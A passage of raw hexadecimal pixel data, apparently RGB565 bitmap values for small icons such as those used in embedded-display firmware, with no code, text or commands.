0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffdf, 0xffdf, 0xffdf, 0xffde, 0xf7ff, 0xe7ff, 0xbf7f, 0x6dbc, 0x3498, 0x13d5, 0x0b95, 0x1374, 0x1b74, 0x1b53, 0x1b31, 0x1b91, 0x1371, 0x0b52, 0x13d5, 0x1c18, 0x651b, 0x8e7e, 0xcfff, 0xe7ff, 0xffff, 0xffbe, 0xffbd, 0xffbd, 0xfffe, 0xf7fe, 0xf7ff, 0xffdf, 0xffff, 0xffdf, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffbf, 0xffbf, 0xffbe, 0xfffe, 0xf7ff, 0xdfff, 0x8e5e, 0x551b, 0x2416, 0x13d4, 0x1392, 0x1372, 0x1373, 0x1374, 0x1b52, 0x1394, 0x0bb4, 0x0bb4, 0x1bf5, 0x3c97, 0x75fd, 0xaf7f, 0xd7ff, 0xf7ff, 0xfffd, 0xfffd, 0xfffe, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xf7ff, 0xf7df, 0xffff, 0xffbf, 0xffff, 0xfffd, 0xffbc, 0xffdd, 0xffff, 0xdfff, 0xc7ff, 0x867e, 0x4cb8, 0x2c17, 0x1bb6, 0x0b54, 0x0b54, 0x1374, 0x1353, 0x1352, 0x1353, 0x1374, 0x1396, 0x13d7, 0x34ba, 0x6ddc, 0xbfff, 0xdfff, 0xefff, 0xffdd, 0xffde, 0xf7ff, 0xefff, 0xffff, 0xf7be, 0xffff, 0xefff, 0xefff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffde, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7be, 0xffff, 0xfffe, 0xf7ff, 0xe7ff, 0xc7bf, 0x865d, 0x44d9, 0x1bb5, 0x13b5, 0x0b74, 0x1374, 0x1373, 0x1b93, 0x1b93, 0x1352, 0x1373, 0x1394, 0x23d5, 0x44f9, 0x763d, 0xbfdf, 0xefff, 0xf7be, 0xfffe, 0xffde, 0xf7ff, 0xf7ff, 0xffdf, 0xffdf, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xefff, 0xf7ff, 0xfffe, 0xffde, 0xffbe, 0xffdf, 0xffdf, 0xf7df, 0xe7ff, 0xcfff, 0x7e3c, 0x34b8, 0x1bf7, 0x1375, 0x1b74, 0x2353, 0x1b73, 0x1331, 0x1b52, 0x1373, 0x1394, 0x13b5, 0x1bf6, 0x44fa, 0x869e, 0xcfff, 0xefff, 0xffff, 0xffdd, 0xfffe, 0xf7de, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xff9f, 0xffbf, 0xffff, 0xffff, 0xf7df, 0xffdf, 0xffde, 0xfffd, 0xfffe, 0xe7ff, 0xd7ff, 0x96bf, 0x4cf9, 0x2415, 0x1bb5, 0x1374, 0x1353, 0x1b74, 0x1353, 0x1374, 0x1374, 0x1354, 0x1334, 0x23b7, 0x3459, 0x661e, 0xa7bf, 0xd7ff, 0xf7fe, 0xffdd, 0xffdd, 0xffde, 0xfffd, 0xfffe, 0xfffe, 0xffdf, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xf7df, 0xffff, 0xffff, 0xffdf, 0xf7ff, 0xefff, 0x9ebe, 0x4c96, 0x1b52, 0x0b33, 0x0b75, 0x2c99, 0x55bc, 0x7e9e, 0x96ff, 0x9f1f, 0xaf9f, 0x973f, 0x8f3e, 0x663b, 0x34f9, 0x13f9, 0x1313, 0x1b93, 0x1b73, 0x75dc, 0xd7ff, 0xf7ff, 0xffbd, 0xffdd, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffdf, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xefff, 0xf7df, 0xffdf, 0xf79f, 0xf7ff, 0xd7ff, 0x7579, 0x3393, 0x1b34, 0x1b75, 0x1bd6, 0x3cf9, 0x6e1d, 0x96ff, 0x9f1f, 0x9f1f, 0x9f1f, 0x971f, 0x767e, 0x559a, 0x2c97, 0x1394, 0x0313, 0x1b74, 0x4477, 0xa6df, 0xefff, 0xffff, 0xffde, 0xffde, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7fe, 0xffff, 0xffdf, 0xffdf, 0xffdf, 0xffde, 0xffff, 0xf7ff, 0xcf9f, 0x6519, 0x23b5, 0x0b33, 0x1373, 0x23d7, 0x4cfb, 0x6e1e, 0x8edf, 0x973f, 0x9f3f, 0x9f3f, 0x96ff, 0x7e3e, 0x557d, 0x2418, 0x0355, 0x0b74, 0x1bb3, 0x4cf5, 0x9f5e, 0xefff, 0xefff, 0xe7ff, 0xf7fe, 0xfffe, 0xfffe, 0xffff, 0xefff, 0xf7fe, 0xfffd, 0xfffd, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xfffe, 0xffff, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xf7ff, 0xe7ff, 0xbf9f, 0x5cf7, 0x2394, 0x0b33, 0x0b54, 0x3458, 0x4d1b, 0x763f, 0x8edf, 0x96df, 0x9f1f, 0xa71f, 0x96df, 0x765e, 0x451a, 0x2418, 0x0353, 0x0b93, 0x13b2, 0x5cf8, 0xbf3f, 0xe7ff, 0xf7ff, 0xefff, 0xf7ff, 0xffff, 0xffff, 0xffde, 0xffff, 0xf7fe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xe7ff, 0xeffe, 0xfffe, 0xffdd, 0xf7be, 0xefff, 0xe7ff, 0xb71f, 0x5474, 0x1b30, 0x0b52, 0x0374, 0x2c99, 0x4d5c, 0x8e7f, 0x9e9f, 0xa75f, 0xa73f, 0xa75f, 0x8edf, 0x6dfd, 0x453b, 0x1c58, 0x0395, 0x0373, 0x23f4, 0x5d16, 0xcfff, 0xefff, 0xf7ff, 0xf7df, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xf7de, 0xf7ff, 0xdfff, 0xc7ff, 0x75d9, 0x23b3, 0x1373, 0x0b94, 0x1c17, 0x44d9, 0x6dbc, 0x9ebe, 0x971f, 0x975f, 0x9f7f, 0x96ff, 0x865e, 0x653d, 0x3c3b, 0x1398, 0x0354, 0x0b92, 0x3c94, 0x9efd, 0xdfff, 0xf7ff, 0xf7ff, 0xfffe, 0xffde, 0xfffe, 0xffff, 0xffdf, 0xffff, 0xf7df, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xfffe, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffde, 0xff9c, 0xfffe, 0xefdf, 0xb73f, 0x3418, 0x0b75, 0x1393, 0x44b5, 0x96bd, 0xcfff, 0xdfff, 0xe7ff, 0xe7ff, 0xe7ff, 0xdfff, 0xcfdf, 0xd7ff, 0xdfff, 0xdfff, 0xdfff, 0xdfff, 0xb73f, 0x6d79, 0x2c16, 0x0354, 0x1395, 0x6dba, 0xd7ff, 0xefff, 0xefdf, 0xffdf, 0xf7bf, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xefff, 0xefff, 0xf7ff, 0xd7ff, 0x6d9a, 0x1394, 0x0b54, 0x2bd6, 0x755a, 0xb71f, 0xdfff, 0xe7ff, 0xefff, 0xefff, 0xf7ff, 0xffff, 0xe7ff, 0xefff, 0xefff, 0xe7ff, 0xdfff, 0xd7ff, 0x9e5d, 0x5456, 0x1b54, 0x0b55, 0x2c17, 0xb77f, 0xefff, 0xffde, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xff9e, 0xffff, 0xf7ff, 0xcfbf, 0x655a, 0x1334, 0x1355, 0x33d5, 0x75b9, 0xbfbf, 0xdfff, 0xe7ff, 0xefff, 0xefff, 0xefff, 0xefff, 0xefff, 0xe7ff, 0xefff, 0xefff, 0xe7ff, 0xd7bf, 0x965d, 0x3c15, 0x1353, 0x1395, 0x44d9, 0xaf9f, 0xe7ff, 0xfffe, 0xfffb, 0xffbb, 0xffff, 0xf7ff, 0xf7ff, 0xfffd, 0xfffd, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xfffe, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xefff, 0xf7ff, 0xfffe, 0xffdd, 0xffff, 0xffff, 0xffde, 0xffff, 0xf7de, 0xefff, 0xcf9f, 0x4d1a, 0x0b32, 0x1b54, 0x3c37, 0x7dfd, 0xc7bf, 0xe7ff, 0xefff, 0xefff, 0xefff, 0xf7ff, 0xf7ff, 0xf7ff, 0xefff, 0xe7ff, 0xe7ff, 0xd7ff, 0xcfff, 0x7dba, 0x3435, 0x13b5, 0x0b75, 0x553b, 0xc7bf, 0xf7ff, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xf7ff, 0xf7fe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffd, 0xfffe, 0xffff, 0xefff, 0xbfbf, 0x44b8, 0x1332, 0x2373, 0x4c55, 0x861b, 0xcfff, 0xcfff, 0xe7ff, 0xefff, 0xf7ff, 0xe7ff, 0xefff, 0xefff, 0xefff, 0xefff, 0xe7ff, 0xdfff, 0xbf9f, 0x75fb, 0x23f4, 0x1bd4, 0x0b31, 0x6559, 0xd7ff, 0xf7ff, 0xf7be, 0xf7ff, 0xffff, 0xf7ff, 0xf7df, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffd, 0xffff, 0xf7ff, 0xffff, 0xfffd, 0xf7ff, 0xd7ff, 0x65bb, 0x13b4, 0x0b72, 0x2bf3, 0x6d78, 0xaf7f, 0xd7ff, 0xe7ff, 0xf7ff, 0xf7ff, 0xefff, 0xe7ff, 0xe7ff, 0xf7ff, 0xf7ff, 0xefff, 0xdfff, 0xcfdf, 0x9e7c, 0x54d5, 0x1392, 0x0395, 0x1c17, 0xa71f, 0xe7ff, 0xf7ff, 0xf7ff, 0xffff, 0xffde, 0xffde, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffdf, 0xf7ff, 0x8578, 0x1b94, 0x03b7, 0x44da, 0xa77f, 0xd7ff, 0xefff, 0xffbe, 0xffde, 0xffbc, 0xfffd, 0x7c30, 0x3a4d, 0x21ed, 0x324e, 0x8494, 0xffde, 0xffde, 0xff5d, 0xfffe, 0xefff, 0xc7ff, 0x65fe, 0x1417, 0x0bb5, 0x3c96, 0xb79f, 0xe7ff, 0xffff, 0xf7bf, 0xffff, 0xffff, 0xfffe, 0xffde, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xefff, 0xdfff, 0xaf3e, 0x3c75, 0x0b94, 0x1bf8, 0x6dff, 0xc7df, 0xe7ff, 0xffff, 0xffdc, 0xff9c, 0xffde, 0xffdf, 0xff9e, 0xffbe, 0xffff, 0xffbd, 0xffbc, 0xfffd, 0xffdd, 0xffde, 0xffdf, 0xefdf, 0xaf3f, 0x34da, 0x03b7, 0x1395, 0x7dba, 0xf7ff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffbf, 0xf7de, 0xffff, 0xffff, 0xefff, 0xa69e, 0x3416, 0x0bb6, 0x2438, 0x7e3f, 0xdfff, 0xf7ff, 0xfffd, 0xffdc, 0xfffc, 0xffdc, 0xffdc, 0xffdc, 0xffdd, 0xfffe, 0xffde, 0xffde, 0xff9c, 0xffbc, 0xffde, 0xffff, 0xe7ff, 0xa6df, 0x445a, 0x0375, 0x1bb6, 0x8dfc, 0xefff, 0xfffc, 0xffdc, 0xffde, 0xf7ff, 0xf7ff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xefff, 0xf7ff, 0xffde, 0xfffe, 0xfffe, 0xf7df, 0xffff, 0xf7ff, 0xe7ff, 0x9e7c, 0x33b3, 0x1375, 0x3437, 0x96bf, 0xd7ff, 0xefff, 0xffff, 0xffde, 0xffbd, 0xffdd, 0xffdd, 0xffdd, 0xffbd, 0xffbd, 0xffdd, 0xffdd, 0xffbd, 0xfffd, 0xfffe, 0xf7ff, 0xdfff, 0x96df, 0x2458, 0x0354, 0x3416, 0xa65c, 0xefff, 0xf7fe, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffde, 0xfffc, 0xfffd, 0xf7ff, 0xdfff, 0x861c, 0x1373, 0x0b74, 0x3c98, 0x9eff, 0xdfff, 0xf7ff, 0xfffe, 0xfffd, 0xffdd, 0xffdd, 0xffbd, 0xffdd, 0xfffe, 0xffbe, 0xffde, 0xffde, 0xff9c, 0xffdd, 0xfffe, 0xefff, 0xd7ff, 0x7e7e, 0x2c37, 0x1b53, 0x43f4, 0xb6be, 0xf7ff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffc, 0xf7fd, 0xf7ff, 0xefdf, 0xefff, 0xbf5f, 0x4456, 0x0b55, 0x2438, 0x6dfc, 0xcfff, 0xe7ff, 0xf7ff, 0xffff, 0xfffe, 0xff9b, 0xf77c, 0xf79d, 0xef7d, 0xff9d, 0xff9c, 0xffbd, 0xfffe, 0xfffe, 0xfffc, 0xfffc, 0xf7ff, 0xaf3f, 0x3cdb, 0x0bd8, 0x1354, 0x6d7a, 0xd7ff, 0xe7ff, 0xefff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xf7df, 0xf7ff, 0xdfff, 0x4454, 0x1b92, 0x23b3, 0x86df, 0xe7ff, 0xefff, 0xf7df, 0xffdf, 0xfffe, 0xffdf, 0xffff, 0x5b0f, 0x21aa, 0x7cb6, 0xae3c, 0x7c97, 0x1929, 0x73b2, 0xffdf, 0xfffe, 0xfffe, 0xf7de, 0xf7ff, 0xe7ff, 0xb79f, 0x4d19, 0x1373, 0x2bd4, 0xa6be, 0xe7ff, 0xffff, 0xf7df, 0xf7fe, 0xf7fe, 0xffde, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffdf, 0xffde, 0xffdf, 0xffdf, 0xf7ff, 0x9e9d, 0x23d2, 0x0bb2, 0x4518, 0xbfbf, 0xefff, 0xf7df, 0xffff, 0xfffe, 0xfffd, 0xfffd, 0xffde, 0xffbe, 0xffbe, 0xfffe, 0xffbe, 0xfffe, 0xfffd, 0xffdc, 0xfffd, 0xfffe, 0xffde, 0xffff, 0xf7ff, 0xdfff, 0x8e9e, 0x1bd5, 0x1374, 0x4c97, 0xe7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffdf, 0xffff, 0xe7be, 0xdfff, 0x8e5c, 0x1b52, 0x1b74, 0x551a, 0xc7ff, 0xe7ff, 0xf7fe, 0xffdd, 0xffdd, 0xfffd, 0xfffd, 0xfffd, 0xffbd, 0xffbe, 0xffde, 0xffde, 0xffde, 0xffbd, 0xffdd, 0xfffd, 0xffbd, 0xffff, 0xf7ff, 0xefff, 0xe7ff, 0x865d, 0x2394, 0x0b54, 0x5d5a, 0xdfff, 0xffff, 0xffdf, 0xffdf, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7ff, 0xfffe, 0xffde, 0xffdf, 0xf7ff, 0xdfff, 0x6d7a, 0x1b74, 0x0b74, 0x7d99, 0xd7ff, 0xe7ff, 0xefff, 0xf7de, 0xfffe, 0xfffd, 0xffbc, 0xffbc, 0xffdd, 0xffbd, 0xfffe, 0xffff, 0xffbe, 0xffde, 0xffde, 0xfffe, 0xffdd, 0xfffe, 0xffde, 0xefff, 0xd7ff, 0x6ddc, 0x1394, 0x1b94, 0x757a, 0xe7ff, 0xefdf, 0xffde, 0xffde, 0xffbe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffde, 0xf7be, 0xff7c, 0xffff, 0xcfff, 0x5d9b, 0x13b5, 0x1bd4, 0x7e1b, 0xdfff, 0xefff, 0xf7ff, 0xffff, 0xffbf, 0xffbe, 0xffde, 0xffbd, 0xffdd, 0xffbe, 0xfffe, 0xffde, 0xffdd, 0xffde, 0xffbd, 0xffdd, 0xffde, 0xfffe, 0xf7ff, 0xe7ff, 0xd7ff, 0x5cf8, 0x2353, 0x2374, 0x863f, 0xf7ff, 0xf7ff, 0xefbe, 0xf7ff, 0xf7df, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7de, 0xfffc, 0xffdd, 0xffff, 0xe7ff, 0x8e7e, 0x1bb4, 0x1332, 0x6cf9, 0xcf5f, 0xe7ff, 0xefff, 0xf7fe, 0xffff, 0xffbe, 0x9d14, 0x53af, 0x7c12, 0x7c32, 0x7c11, 0x7c12, 0x6bd1, 0x534e, 0xeffe, 0xf7dc, 0xfffc, 0xffbc, 0xffdf, 0xefbf, 0xe7ff, 0x967e, 0x2bf5, 0x0b75, 0x4c76, 0xd7ff, 0xefff, 0xf7df, 0xffde, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xf7ff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xf7ff, 0xf7ff, 0xffdf, 0xffbe, 0xffff, 0xcfff, 0x1bf4, 0x03f5, 0x2cd8, 0xc7ff, 0xe7ff, 0xffdb, 0xffde, 0xff9f, 0xffbf, 0xefdf, 0xefff, 0x853b, 0x012d, 0xb71f, 0xdfff, 0xdfff, 0xdfff, 0xbedf, 0x00ec, 0x9e1c, 0xd7ff, 0xe7ff, 0xffdf, 0xffde, 0xffbd, 0xffff, 0xdfff, 0x7e3f, 0x1354, 0x2311, 0xa65b, 0xf7ff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xad9e, 0x2ad2, 0x0b72, 0x76de, 0xd7ff, 0xf7df, 0xffbd, 0xff9d, 0xffde, 0xefff, 0xe7ff, 0xf7ff, 0xf7ff, 0xf7ff, 0xefff, 0xe7ff, 0xf7ff, 0xf7ff, 0xf7fe, 0xf7fe, 0xf7ff, 0xefff, 0xefff, 0xffff, 0xffdb, 0xffdb, 0xf7ff, 0xb7ff, 0x24bc, 0x0376, 0x4414, 0xefde, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffbf, 0xf7bf, 0xe7ff, 0x6d97, 0x0b92, 0x13b5, 0x96df, 0xe7ff, 0xffff, 0xfffc, 0xfffc, 0xffff, 0xffdf, 0xffff, 0xf7ff, 0xf7ff, 0xefff, 0xefff, 0xf7ff, 0xf7df, 0xffff, 0xffff, 0xefff, 0xe7ff, 0xe7ff, 0xdfdf, 0xeffe, 0xfffc, 0xfffb, 0xf7ff, 0xaf7f, 0x0c39, 0x03f9, 0x3c98, 0xe7ff, 0xffdf, 0xffdf, 0xffff, 0xf7ff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffde, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xf7ff, 0xf7ff, 0xfffe, 0xffde, 0xefff, 0x64d8, 0x1b95, 0x0bd7, 0x777f, 0xfffe, 0xfffd, 0xfffd, 0xfffd, 0xfffe, 0xf7fe, 0xf7ff, 0xefff, 0xf7ff, 0xefdf, 0xf7ff, 0xefff, 0xf7ff, 0xf7ff, 0xf7df, 0xffff, 0xefff, 0xf7ff, 0xffff, 0xffdd, 0xffbc, 0xffff, 0xdfff, 0x977f, 0x03d7, 0x0b96, 0x5cd8, 0xf7ff, 0xffdd, 0xffdc, 0xffbe, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffde, 0xffdf, 0xefff, 0x2bf6, 0x03d7, 0x0bf7, 0xb7ff, 0xe7ff, 0xffdc, 0xffdc, 0xfffe, 0xffdf, 0xf7df, 0xf7ff, 0xf7df, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffde, 0xfffe, 0xf7df, 0xe7ff, 0x8e9f, 0x1c19, 0x0358, 0x9d55, 0xf7ff, 0xefdf, 0xf7df, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7de, 0xf7be, 0xfffe, 0xffbf, 0xffff, 0x8dfd, 0x0bb7, 0x03d7, 0x7e3e, 0xffff, 0xffde, 0xffbd, 0xf7ff, 0xf7ff, 0xffdf, 0xffdf, 0x32ef, 0x8f1f, 0xdfff, 0xe7ff, 0xe7ff, 0xdfff, 0xcfff, 0x0a4e, 0xd7ff, 0xe7ff, 0xefff, 0xf7df, 0xffbf, 0xffde, 0xff9b, 0xffff, 0xbfff, 0x1c9c, 0x1b73, 0x3bd3, 0xd7ff, 0xf7ff, 0xffde, 0xfffd, 0xffde, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xf7bf, 0xf7ff, 0xc7ff, 0x1c36, 0x0395, 0x6cf8, 0xffdf, 0xffdd, 0xf7fd, 0xffff, 0xf79f, 0xffff, 0xff9c, 0xffdc, 0xf7ff, 0x3b31, 0x5c15, 0xefff, 0xfffe, 0xffbd, 0xf7ff, 0xefff, 0x42f0, 0x6c34, 0xefff, 0xf7fd, 0xfffe, 0xffbe, 0xffff, 0xf7de, 0xfffe, 0xf7ff, 0x9ebc, 0x1c16, 0x0375, 0x8e3f, 0xf7ff, 0xffdf, 0xffff, 0xffff, 0xfffe, 0xfffd, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffdf, 0xf7ff, 0xdfff, 0x865d, 0x0374, 0x23b3, 0xc71e, 0xffff, 0xfffe, 0xf7fe, 0xefdf, 0xf7ff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffdf, 0xffff, 0xde9b, 0xefff, 0xffff, 0xfffe, 0xffdd, 0xfffe, 0xfffe, 0xffbe, 0xffdf, 0xffff, 0xf7bf, 0xffff, 0xffdf, 0xefff, 0x6cf5, 0x1351, 0x2499, 0xe7bf, 0xefff, 0xf7ff, 0xf7ff, 0xf7de, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xfffd, 0xefff, 0x559c, 0x03f9, 0x1bd5, 0xcf7d, 0xffff, 0xb65e, 0xaedf, 0xbede, 0xf7fe, 0xe7df, 0x9e1e, 0xcf1b, 0xe7df, 0xd73f, 0xbe3b, 0xe79e, 0xefff, 0xefff, 0xadfa, 0xd71c, 0xffff, 0xdf9f, 0xae5a, 0xdf7c, 0xfffe, 0xdf1d, 0xbe5e, 0xa69f, 0xcf5f, 0xdfdf, 0x3c36, 0x0396, 0x3c78, 0xe7ff, 0xfffe, 0xf7fe, 0xefff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xfffe, 0xf7fe, 0xffff, 0xf7ff, 0xdfff, 0x5517, 0x0b73, 0x3436, 0xdfdf, 0xffbc, 0xf7bf, 0xffff, 0xf7ff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffbe, 0xfffe, 0xf7ff, 0xbf1f, 0x5439, 0x5418, 0xc73f, 0xf7ff, 0xfffd, 0xf7be, 0xffff, 0xffff, 0xfffe, 0xf7fe, 0xefbf, 0xffdf, 0xffdf, 0xe7be, 0x4c33, 0x0b34, 0x4d5d, 0xcfff, 0xf7fe, 0xffdd, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffde, 0xffdc, 0xd7ff, 0x4cb9, 0x0b77, 0x44bb, 0xcfdf, 0xffff, 0xffdf, 0xf7ff, 0xe7ff, 0xefff, 0xffff, 0xfffd, 0xfffd, 0xfffd, 0xefff, 0xe7ff, 0xae3b, 0xae1b, 0xadfa, 0xadfa, 0xb63a, 0xa619, 0x9e39, 0xa65a, 0xae1b, 0xadfa, 0xadf8, 0xb5f7, 0xadf6, 0xae59, 0x9eff, 0x23f7, 0x03fa, 0x659b, 0xf7ff, 0xff9d, 0xffdf, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffdf, 0xffbf, 0xffff, 0xfffd, 0xfffb, 0xffbc, 0xe7ff, 0x7e7f, 0x03b6, 0x13b5, 0xa6bd, 0xf7ff, 0xffff, 0xffde, 0xffde, 0xff9e, 0xffff, 0xefff, 0xe7ff, 0x328d, 0xa5db, 0xfffd, 0xf7fe, 0xf7df, 0xf7ff, 0xd77f, 0x11ca, 